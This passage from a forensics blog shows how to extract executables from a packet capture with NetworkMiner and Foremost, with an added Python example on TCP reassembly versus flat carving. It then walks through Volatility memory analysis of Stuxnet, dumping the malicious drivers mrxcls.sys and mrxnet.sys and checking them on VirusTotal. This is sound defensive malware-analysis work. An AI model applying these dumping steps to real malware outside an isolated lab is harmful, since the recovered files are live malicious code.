<a href="https://www.virustotal.com/en/file/816b21df749b17029af83f94273fe0fe480d25ee2f84fb25bf97d06a8fadefe4/analysis/" target="_blank">https://www.virustotal.com/en/<wbr></wbr>file/<wbr></wbr>816b21df749b17029af83f94273fe0<wbr></wbr>fe480d25ee2f84fb25bf97d06a8fad<wbr></wbr>efe4/analysis/</a><br />
<br />
<a href="https://www.virustotal.com/en/file/3483a7264a3bef074d0c2715e90350ca1aa7387dee937679702d5ad79b0c84ca/analysis/" target="_blank">https://www.virustotal.com/en/<wbr></wbr>file/<wbr></wbr>3483a7264a3bef074d0c2715e90350<wbr></wbr>ca1aa7387dee937679702d5ad79b0c<wbr></wbr>84ca/analysis/</a><br />
<br />
<a href="https://www.virustotal.com/en/file/5d651f449d12e6bc75a0c875b4dae19d8b3ec8b3933b6c744942b5763d5df08d/analysis/" target="_blank">https://www.virustotal.com/en/<wbr></wbr>file/<wbr></wbr>5d651f449d12e6bc75a0c875b4dae1<wbr></wbr>9d8b3ec8b3933b6c744942b5763d5d<wbr></wbr>f08d/analysis/</a><br />
<br />
<a href="https://www.virustotal.com/en/file/bd56609c386a6b5bc18254c7327d221af182193eee5008f6e405ab5c1215b070/analysis/" target="_blank">https://www.virustotal.com/en/<wbr></wbr>file/<wbr></wbr>bd56609c386a6b5bc18254c7327d22<wbr></wbr>1af182193eee5008f6e405ab5c1215<wbr></wbr>b070/analysis/</a></div>
<h3>
NetworkMiner</h3>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: justify;">
NetworkMiner is another Network Forensic Analysis Tool (NFAT), for Windows, and it can also be installed on Linux using Mono. It is a great alternative to Wireshark if you just want to extract the files that were downloaded, look at the sessions, list the DNS queries or get details about the e-mails found in a pcap file.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
As soon as the capture file is loaded, NetworkMiner extracts every file in it to disk. Because of that, if you are running an antivirus, it may alert on (or quarantine) files it detects as malicious, so run it on an analysis machine where that is expected.</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2O66HbvHX_gE9q3ti8C0Rdikf642Tsun6-gHhnLPbxKYc_NsdikOfUDELUkPG6jm-lmmomM-7jwh0jg2T1y-9cqJvGLgQKe6TvXGpHY15ATq-j3sv7s-enqHeMuHjurXp1uEKxlWomc0/s1600/NetworkMinner_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2O66HbvHX_gE9q3ti8C0Rdikf642Tsun6-gHhnLPbxKYc_NsdikOfUDELUkPG6jm-lmmomM-7jwh0jg2T1y-9cqJvGLgQKe6TvXGpHY15ATq-j3sv7s-enqHeMuHjurXp1uEKxlWomc0/s640/NetworkMinner_1.png" height="184" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
You can find the folder where the files have been recovered by right-clicking on a file and selecting "Open Folder". In the picture below you can see this folder.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFqV-8YsoTWPvpsqJPPLPf2QDfy3wRtb_XAVzu9xoGx6c90ms3_MgMTWsQqZz65ldcfArv0qk2Gwebv8xLHnHpo-Cjm5Q2V7vFTUHW6J5zWw-OXfaCcOCLZUJjTlCoGecIPLSVngqoayU/s1600/NetworkMinner_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFqV-8YsoTWPvpsqJPPLPf2QDfy3wRtb_XAVzu9xoGx6c90ms3_MgMTWsQqZz65ldcfArv0qk2Gwebv8xLHnHpo-Cjm5Q2V7vFTUHW6J5zWw-OXfaCcOCLZUJjTlCoGecIPLSVngqoayU/s640/NetworkMinner_2.png" height="116" width="640" /></a></div>
<br />
If we compute the SHA256 checksums of the PE files, we can see that the results are exactly the same as with Wireshark. We have got the same files.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbbMcKUx1dz8EVSOQX57F67cMPYcbaJ4VPIhwdYoEbAm9iNeM7RmzgOKoP491F9hTePfdf_hRQAFQI1BQB3GY5vM3Wx30DfCI5U0h2KImSJcnDdDDu5EIrtkaPHU6tjsdcVzw0Fs1gvBA/s1600/NetworkMinner_6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbbMcKUx1dz8EVSOQX57F67cMPYcbaJ4VPIhwdYoEbAm9iNeM7RmzgOKoP491F9hTePfdf_hRQAFQI1BQB3GY5vM3Wx30DfCI5U0h2KImSJcnDdDDu5EIrtkaPHU6tjsdcVzw0Fs1gvBA/s640/NetworkMinner_6.png" height="96" width="640" /></a></div>
<h3>
Foremost</h3>
<div style="text-align: justify;">
Foremost is a well known file carving tool. It was developed by the United States Air Force Office of Special Investigations and The Centre for Information Systems Security Studies and Research and now, it has been opened to the general public.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This tool has been designed to work on image files, such as those generated by dd, Safeback, EnCase, etc., or directly on a drive.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Although I usually use Wireshark or NetworkMiner, I have read some blogs describing how to use Foremost to extract files from a pcap, so I decided to try it on our example as well.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Once the pcap has been downloaded, we execute the command in the picture below to extract all the files.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-vIQs4Lr3CdodUM2h5L2AsobOxLu8bhYKTHFPb8T47B6LAbhtJB2ea1TMJq3wE2QLoL0H0Mp9tOmiONpNTvBqFMG0giXkc8TqfX2CtNHIZZ4nYpfhRqdd2YwaKi9V5upcTXJFKhkfjes/s1600/Foremost_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-vIQs4Lr3CdodUM2h5L2AsobOxLu8bhYKTHFPb8T47B6LAbhtJB2ea1TMJq3wE2QLoL0H0Mp9tOmiONpNTvBqFMG0giXkc8TqfX2CtNHIZZ4nYpfhRqdd2YwaKi9V5upcTXJFKhkfjes/s640/Foremost_1.png" height="505" width="640" /></a></div>
<br />
<div style="text-align: justify;">
We can check that a "/output/exe" folder has been created containing six files. </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRHlRBg4RSeDHSakEQBvktwhZIO-ZRNXH6eWUKMbpYd2P_fRoNcrvTwvgqEYVUaH9Ov9yzbjInLPLwS6InZ7bNGu0jo8Qa7Oa_s4fhrI4BWhLAjURcUCJjvAS9xwVZw6O2malLagcvoJQ/s1600/Foremost_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRHlRBg4RSeDHSakEQBvktwhZIO-ZRNXH6eWUKMbpYd2P_fRoNcrvTwvgqEYVUaH9Ov9yzbjInLPLwS6InZ7bNGu0jo8Qa7Oa_s4fhrI4BWhLAjURcUCJjvAS9xwVZw6O2malLagcvoJQ/s1600/Foremost_2.png" /></a></div>
<br />
<div style="text-align: justify;">
But the checksums are different from the ones we got with Wireshark or NetworkMiner. Foremost has no notion of TCP: it scans the pcap as a flat image, so the bytes it carves after an MZ signature still contain the pcap record headers and the Ethernet/IP/TCP headers of every following packet, and segments that were captured out of order or retransmitted stay that way. That is why the recovered executables do not match, and why I don't usually use it on a pcap file...</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdJIkFNxLfz43o7-fCu0bk_6S4WOIhmqt0114LkQJuCfxTkR7hdxuQZZ3zoRlGkMVTvwbnWsn0iqI-ffeo4h1c7BKsGkaW8l-VeLFmQvGaEhZxjOHPgnJD2kRg22wO63LmpkfdrWG93sk/s1600/Foremost_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdJIkFNxLfz43o7-fCu0bk_6S4WOIhmqt0114LkQJuCfxTkR7hdxuQZZ3zoRlGkMVTvwbnWsn0iqI-ffeo4h1c7BKsGkaW8l-VeLFmQvGaEhZxjOHPgnJD2kRg22wO63LmpkfdrWG93sk/s640/Foremost_4.png" height="101" width="640" /></a></div>
<br />
<div style="text-align: justify;">
I've uploaded these files to my Cuckoo Sandbox and they seem to be corrupted, because they could not run properly...</div>
<br />
<div style="text-align: justify;">
The VirusTotal links below redirect you to the reports of the corrupted executables:</div>
<br />
<div style="text-align: center;">
<a href="https://www.virustotal.com/en/file/2bcc5f03e1d63c5fab4aa362f6aecd43def44cc3c246effc13accb7b27b1bd45/analysis/" target="_blank">https://www.virustotal.com/en/file/2bcc5f03e1d63c5fab4aa362f6aecd43def44cc3c246effc13accb7b27b1bd45/analysis/</a></div>
<br />
<div style="text-align: center;">
<a href="https://www.virustotal.com/en/file/647e4bbed78346eccc7c2d12826da5f17414110e52fb200ee55f2b8c5df533f1/analysis/" target="_blank">https://www.virustotal.com/en/file/647e4bbed78346eccc7c2d12826da5f17414110e52fb200ee55f2b8c5df533f1/analysis/</a></div>
<br />
<div style="text-align: center;">
<a href="https://www.virustotal.com/en/file/38bc430e9d8656ee227e48236157e716b1d5038e83e53937cb534a5920d28c28/analysis/" target="_blank">https://www.virustotal.com/en/file/38bc430e9d8656ee227e48236157e716b1d5038e83e53937cb534a5920d28c28/analysis/</a></div>
<br />
<div style="text-align: center;">
<a href="https://www.virustotal.com/en/file/15964d7dd9644c8ce29fbcc4585b85394af10545ac2a2ba2315befe8e93b2a4d/analysis/" target="_blank">https://www.virustotal.com/en/file/15964d7dd9644c8ce29fbcc4585b85394af10545ac2a2ba2315befe8e93b2a4d/analysis/</a></div>
<br />
<div style="text-align: center;">
<a href="https://www.virustotal.com/en/file/32159b706d1addf63cdb1978291fc7222558d8fb7a3044775e242fba9661838d/analysis/" target="_blank">https://www.virustotal.com/en/file/32159b706d1addf63cdb1978291fc7222558d8fb7a3044775e242fba9661838d/analysis/ </a></div>
<br />
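<div style="text-align: justify;">
The difference between the two results is worth seeing in code. Wireshark and NetworkMiner rebuild each TCP stream in sequence-number order, discard retransmissions and strip the HTTP headers before writing the object out; a disk carver reads the .pcap as one flat byte array, so the pcap record headers and the Ethernet/IP/TCP headers of every following packet land inside the carved "executable", and segments captured out of order stay out of order. The Python below is an added example, not code from this post or from any of the three tools: it constructs a tiny capture in memory (a fake MZ file served over HTTP in out-of-order segments with one retransmission), recovers it both ways and compares the SHA-256 hashes. The addresses, ports, function names and sample bytes are all constructed for the example.</div>

```python
"""Two ways of getting a downloaded file back out of a pcap: rebuilding the
TCP stream (what Wireshark's Export Objects and NetworkMiner do) versus
carving the capture file as if it were a disk image (what Foremost does).
Added example with a capture constructed in memory; not the Barracuda pcap."""
import hashlib
import struct

# Constructed stand-in for a downloaded executable: MZ signature, the DOS
# stub message the Wireshark filter above matches on, then filler bytes.
FAKE_PE = (b"MZ" + b"\x90\x00" * 29
           + b"This program cannot be run in DOS mode.\r\n"
           + bytes(range(256)) * 4)


def _record(seq, payload, src=b"\x0a\x00\x00\x02", dst=b"\x0a\x00\x00\x01"):
    """One pcap record: Ethernet/IPv4/TCP frame 10.0.0.2:80 -> 10.0.0.1:40000
    (checksums left at zero: fine for a parser exercise, not for replay)."""
    tcp = struct.pack("!HHIIBBHHH", 80, 40000, seq, 1, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 1, 0, 64, 6, 0, src, dst)
    frame = b"\x02" * 6 + b"\x04" * 6 + b"\x08\x00" + ip + tcp + payload
    return struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame


def build_capture(file_bytes=FAKE_PE, mss=400):
    """A pcap holding one HTTP/1.1 response that carries file_bytes, split
    into segments that arrive out of order, with one retransmission."""
    response = (b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n"
                + b"Content-Length: %d\r\n\r\n" % len(file_bytes) + file_bytes)
    chunks = [response[i:i + mss] for i in range(0, len(response), mss)]
    order = [0] + list(range(2, len(chunks))) + [1, 1]  # segment 1 late, then repeated
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    return header + b"".join(_record(1000 + i * mss, chunks[i]) for i in order)


def tcp_segments(pcap):
    """Yield (flow, seq, payload) for each TCP segment carrying data."""
    if struct.unpack("<I", pcap[:4])[0] != 0xA1B2C3D4:
        raise ValueError("not a little-endian pcap")
    off = 24
    while off + 16 <= len(pcap):
        incl_len = struct.unpack("<IIII", pcap[off:off + 16])[2]
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if frame[12:14] != b"\x08\x00" or frame[23] != 6:   # IPv4 + TCP only
            continue
        ihl = (frame[14] & 0x0F) * 4
        ip_len = struct.unpack("!H", frame[16:18])[0]
        ip_hdr, tcp = frame[14:14 + ihl], frame[14 + ihl:14 + ip_len]
        sport, dport, seq = struct.unpack("!HHI", tcp[:8])
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            yield (ip_hdr[12:16], sport, ip_hdr[16:20], dport), seq, payload


def reassemble_http_bodies(pcap):
    """Order each stream by sequence number, drop retransmitted/overlapping
    bytes, then cut the body out of the HTTP response using Content-Length."""
    flows = {}
    for flow, seq, payload in tcp_segments(pcap):
        flows.setdefault(flow, {}).setdefault(seq, payload)   # first copy wins
    bodies = []
    for segs in flows.values():
        stream, nxt = b"", None
        for seq in sorted(segs):
            data, end = segs[seq], seq + len(segs[seq])
            if nxt is not None and seq < nxt:
                data = data[nxt - seq:]                       # overlap
            stream += data
            nxt = end if nxt is None else max(nxt, end)
        split = stream.find(b"\r\n\r\n")
        if not stream.startswith(b"HTTP/") or split < 0:
            continue
        headers = stream[:split].decode("latin-1").lower().split("\r\n")
        length = next((int(h.split(":", 1)[1]) for h in headers
                       if h.startswith("content-length:")), None)
        body = stream[split + 4:]
        bodies.append(body if length is None else body[:length])
    return bodies


def carve_flat(pcap, length=len(FAKE_PE)):
    """Mimic a disk carver: treat the capture as a flat image, start at the
    first MZ and take `length` bytes, so pcap record and Ethernet/IP/TCP
    headers of the following packets end up inside the 'file'."""
    start = pcap.find(b"MZ")
    return pcap[start:start + length] if start >= 0 else b""


def looks_like_pe(data):
    """Same heuristic as the Wireshark filter: MZ plus the DOS stub text."""
    return data.startswith(b"MZ") and b"in DOS mode" in data


def compare(pcap=None):
    """SHA-256 of the original, the reassembled body and the flat carve."""
    pcap = build_capture() if pcap is None else pcap
    sha = lambda b: hashlib.sha256(b).hexdigest()
    return {"original": sha(FAKE_PE),
            "reassembled": sha(reassemble_http_bodies(pcap)[0]),
            "carved": sha(carve_flat(pcap))}


if __name__ == "__main__":
    for name, digest in compare().items():
        print(f"{name:12s} {digest}")
```

<div style="text-align: justify;">
Run it and the reassembled digest equals the original while the carved one does not, which is the same mismatch as in the screenshots above. Note that the carved blob still begins with MZ and still contains "in DOS mode", so a signature scan or a VirusTotal lookup will happily call it a PE; only the hash comparison (or trying to execute it, as in Cuckoo) shows that it is not the file that went over the wire.</div>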
<br />Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com1tag:blogger.com,1999:blog-3160485247929481680.post-67245141228121382702014-01-12T02:22:00.000-08:002014-01-12T02:34:19.586-08:00Stuxnet Trojan - Memory Forensics with Volatility | Part IIYou can read the first part of this post here:<br />
<br />
<a href="http://www.behindthefirewalls.com/2013/12/stuxnet-trojan-memory-forensics-with_16.html">http://www.behindthefirewalls.com/2013/12/stuxnet-trojan-memory-forensics-with_16.html</a><br />
<h3>
DETECTING API CALLS</h3>
<div style="text-align: justify;">
With the command below we can list the strings of the files exported in the first part and look for interesting words...</div>
<pre class="brush: java">strings evidences/process.*</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJgeRMxaJXhvLk3W9BaWInT08lxyz2vwDlyqV3ROsFKKXjQa5KeIXXIsDrS05fFfcrDl7f4CMR1Rl0ltrGEWIGaa33x2-a1aGDGaEUinwBEdaiPtAZLdeVJpagkHh9Wt8CUa2iFiyvHGY/s1600/Stuxnet_II_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJgeRMxaJXhvLk3W9BaWInT08lxyz2vwDlyqV3ROsFKKXjQa5KeIXXIsDrS05fFfcrDl7f4CMR1Rl0ltrGEWIGaa33x2-a1aGDGaEUinwBEdaiPtAZLdeVJpagkHh9Wt8CUa2iFiyvHGY/s640/Stuxnet_II_1.png" height="310" width="640" /></a></div>
<br />
<div style="text-align: justify;">
Thanks to Volatility we can list the API hooks present in this memory dump. In the picture below you will see the hooks installed in the malicious process 1928 (the apihooks plugin restricted to that PID).</div>
<pre class="brush: java">python2 vol.py -f stuxnet.vmem apihooks -p 1928</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbB3uWFJehWYPspJapf1rNFnscp_W3BiNv0xSCtYJTADm2NjQPhuhNzrGcbkdHXhn8DqNyyklNN4JbvRouWttDRUQmD6_LGOb22tcTOZTSIYCtDbCYFX6FbfGV1_Wa72shfi0LHzb1aRk/s1600/Stuxnet_II_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbB3uWFJehWYPspJapf1rNFnscp_W3BiNv0xSCtYJTADm2NjQPhuhNzrGcbkdHXhn8DqNyyklNN4JbvRouWttDRUQmD6_LGOb22tcTOZTSIYCtDbCYFX6FbfGV1_Wa72shfi0LHzb1aRk/s640/Stuxnet_II_2.png" height="281" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRu7_-ouxWWZyT8HiD0I-Q715man1albdiQJXYhb8k7daeowRooUZub7pW-LB_-y8e_rsQpcJdbeHmbydVDcwu_W1ySSeoMItT3Oa9NOyQiBhNi_JxG0HNzGFpy0hD-NGJqhsnvIhXPNI/s1600/Stuxnet_II_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRu7_-ouxWWZyT8HiD0I-Q715man1albdiQJXYhb8k7daeowRooUZub7pW-LB_-y8e_rsQpcJdbeHmbydVDcwu_W1ySSeoMItT3Oa9NOyQiBhNi_JxG0HNzGFpy0hD-NGJqhsnvIhXPNI/s640/Stuxnet_II_3.png" height="144" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div style="text-align: justify;">
These hooks are directly linked to the Stuxnet worm. You can read the article below from Symantec. </div>
<br />
<a href="http://www.symantec.com/connect/blogs/w32stuxnet-installation-details" target="_blank">http://www.symantec.com/connect/blogs/w32stuxnet-installation-details</a><br />
<h3>
DETECTING MALICIOUS DRIVERS</h3>
<div style="text-align: justify;">
With modscan we can pick up previously unloaded drivers and drivers that have been hidden or unlinked by rootkits, because it carves driver entries out of physical memory instead of walking the loaded-module list that a rootkit can tamper with.
</div>
<pre class="brush: java">python2 vol.py -f stuxnet.vmem modscan</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZcBEWEGm9QVTKrpGeQfQ8-3SqKb6y_2igLPn1xBptJugQ4Fkp4-OUmG_YcJ4kr57Gv-9ADLeBzIrgX2YD_7N4fLtviwFp9nnvH94QhEw9DWrr1B9ZmSeCKULM4XfdWjsPxRISeX2IX_M/s1600/Stuxnet_II_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZcBEWEGm9QVTKrpGeQfQ8-3SqKb6y_2igLPn1xBptJugQ4Fkp4-OUmG_YcJ4kr57Gv-9ADLeBzIrgX2YD_7N4fLtviwFp9nnvH94QhEw9DWrr1B9ZmSeCKULM4XfdWjsPxRISeX2IX_M/s640/Stuxnet_II_4.png" height="148" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div style="text-align: justify;">
The first driver draws our attention… Take note of its “Base” value (0xb21d8000), because we will dump it with the command below.</div>
<pre class="brush: java">python2 vol.py -f stuxnet.vmem moddump --dump-dir evidences/ --base 0xb21d8000</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2z24CW2Y8cn0r-_in-tfk9Y3OswLR2l5XypLI5IOrXS_f6as1X6XvoTTopX9vb3MRPPwGTfDqxLgDIwA5PxfkT0TL5qr-BraK-L2_Hxf1TL13uqQ-dX3PJlbCYAqUT69f-zSFYSncLVQ/s1600/Stuxnet_II_5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2z24CW2Y8cn0r-_in-tfk9Y3OswLR2l5XypLI5IOrXS_f6as1X6XvoTTopX9vb3MRPPwGTfDqxLgDIwA5PxfkT0TL5qr-BraK-L2_Hxf1TL13uqQ-dX3PJlbCYAqUT69f-zSFYSncLVQ/s640/Stuxnet_II_5.png" height="54" width="640" /></a></div>
<br />
We get the sha256 hash of this driver...<br />
<pre class="brush: java">sha256sum evidences/driver.b21d8000.sys</pre>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPkTMd3b3vmSAfEr5D7yHJNXupLr7Z5gIH4Qn8ZLuQ_L0K5AJSfoUseLUKfrUt5pNS3aSP_m7h7tHlONa5Kt_rCadHET8Q5cORigp2xSkGcD-ou3T-dvtTU_HQ00JfSiqpcxm_oZdWcMo/s1600/Stuxnet_II_6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPkTMd3b3vmSAfEr5D7yHJNXupLr7Z5gIH4Qn8ZLuQ_L0K5AJSfoUseLUKfrUt5pNS3aSP_m7h7tHlONa5Kt_rCadHET8Q5cORigp2xSkGcD-ou3T-dvtTU_HQ00JfSiqpcxm_oZdWcMo/s640/Stuxnet_II_6.png" height="28" width="640" /></a><br />
<br />
...and we upload it to <a href="http://www.virustotal.com/" target="_blank">www.virustotal.com</a><br />
<br />
<div style="text-align: justify;">
Here you have the report, where you will see that this driver has been recognized as malicious.</div>
<br />
<a href="https://www.virustotal.com/en/file/6aa1f54fbd8c79a3109bfc3e7274f212e5bf9c92f740d5a194167ea940c3d06c/analysis/" target="_blank">https://www.virustotal.com/en/file/6aa1f54fbd8c79a3109bfc3e7274f212e5bf9c92f740d5a194167ea940c3d06c/analysis/</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg08XtXKpuf0nE8W_b8stM8uEebwfUmjbRlhIop_6O3ChUEwihISJvt9D57XnLslkvpVZf2PqKg8gc7jq3XjIZgqFCH7oUbIB_3NGjoywbLrahvt9KqkyQv7-bkB5t2TDw4azU_qeToZGM/s1600/Stuxnet_II_VI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg08XtXKpuf0nE8W_b8stM8uEebwfUmjbRlhIop_6O3ChUEwihISJvt9D57XnLslkvpVZf2PqKg8gc7jq3XjIZgqFCH7oUbIB_3NGjoywbLrahvt9KqkyQv7-bkB5t2TDw4azU_qeToZGM/s1600/Stuxnet_II_VI.png" /></a></div>
<br />
<div style="text-align: justify;">
We have just detected a malicious driver, but it is worth looking for other drivers with a similar name in order to find new ones...</div>
<pre class="brush: java">python2 vol.py -f stuxnet.vmem modscan | grep mrx</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI3K5mFhfmhEUV2sDKvSZukc7QVz-QJm4jdc8yt5u0qCzhaq_TUGPvYlkYkUbYAuYX0VfVn27z9mH6si9t2yVq3nrn5mH0zaxMaEzRQQfgmudYX4b4fk0-nlthewwchkDc2HgdwzxWI7g/s1600/Stuxnet_II_7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI3K5mFhfmhEUV2sDKvSZukc7QVz-QJm4jdc8yt5u0qCzhaq_TUGPvYlkYkUbYAuYX0VfVn27z9mH6si9t2yVq3nrn5mH0zaxMaEzRQQfgmudYX4b4fk0-nlthewwchkDc2HgdwzxWI7g/s640/Stuxnet_II_7.png" height="83" width="640" /></a></div>
<br />
<div style="text-align: justify;">
Ok. Let’s dump the second suspicious driver, following the same steps as above.</div>
<pre class="brush: java">python2 vol.py -f stuxnet.vmem moddump --dump-dir evidences/ --base 0xf895a000</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwmFLHqqb9LJSB6wgRUSGa6XOSPQEQk7gQjoIHpJ7D2UCEGhTWluEVDuLRveGt9E2itB3vvDguSjb-tGweNWCuew_pPuGe9hjtJbIN4j78V-eXy0OkRWxh81RBYYxLgeGAICVUTXzDwMo/s1600/Stuxnet_II_10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwmFLHqqb9LJSB6wgRUSGa6XOSPQEQk7gQjoIHpJ7D2UCEGhTWluEVDuLRveGt9E2itB3vvDguSjb-tGweNWCuew_pPuGe9hjtJbIN4j78V-eXy0OkRWxh81RBYYxLgeGAICVUTXzDwMo/s640/Stuxnet_II_10.png" height="52" width="640" /></a></div>
<br />
<a href="https://www.virustotal.com/en/file/6bc86d3bd3ec0333087141215559aec5b11b050cc49e42fc28c2ff6c9c119dbd/analysis/" target="_blank">https://www.virustotal.com/en/file/6bc86d3bd3ec0333087141215559aec5b11b050cc49e42fc28c2ff6c9c119dbd/analysis/</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR8WtoMSgl98kqrSR2gEcjJ_CNc2eLu8AWyzjo8sLN7iOgZPJyvcXSZTUnRODhroUnUFzrcGvT8hDLHIQZHWbP0t1M3KXi4qgQZJoclWvK6jCd4P1DwhmY99EqsTfLMEmB-jAGje0v3K0/s1600/Stuxnet_II_11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR8WtoMSgl98kqrSR2gEcjJ_CNc2eLu8AWyzjo8sLN7iOgZPJyvcXSZTUnRODhroUnUFzrcGvT8hDLHIQZHWbP0t1M3KXi4qgQZJoclWvK6jCd4P1DwhmY99EqsTfLMEmB-jAGje0v3K0/s640/Stuxnet_II_11.png" height="204" width="640" /></a></div>
<br />
We have just found two malicious drivers: mrxcls.sys and mrxnet.sys. <br />
<br />
I checked the other two drivers with the same commands and they are not categorized as malicious files, which is why they are not shown here.<br />
<h3>
DETECTING REGISTRY KEYS</h3>
<div style="text-align: justify;">
In this section we will look for the registry keys that Stuxnet added to the computer. The command below turns up a lot of candidate strings.</div>
<pre class="brush: java">strings stuxnet.vmem | grep -i mrx | grep -i Services</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAnrstYfUxlwb_CHuAlt59rOL9v936OleZz-yru2xg_MhGkoQ-9smPsdRJrZ5lQ9HQ1kM_KyZT5SOWwY5jt3rFNXX3xeFesrJI8IEWz7-vtXO2LUMfB9VKF3KNZqfXD4VehpZAo9lpmaQ/s1600/Stuxnet_II_12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAnrstYfUxlwb_CHuAlt59rOL9v936OleZz-yru2xg_MhGkoQ-9smPsdRJrZ5lQ9HQ1kM_KyZT5SOWwY5jt3rFNXX3xeFesrJI8IEWz7-vtXO2LUMfB9VKF3KNZqfXD4VehpZAo9lpmaQ/s640/Stuxnet_II_12.png" height="138" width="640" /></a></div>
<br />
<div style="text-align: justify;">
We can obtain valuable information about some of them with the next commands.</div>
<pre class="brush: java">python2 vol.py -f stuxnet.vmem printkey -K 'ControlSet001\Services\MrxNet'</pre>
<div class="separator" style="clear: both; text-align: center;">
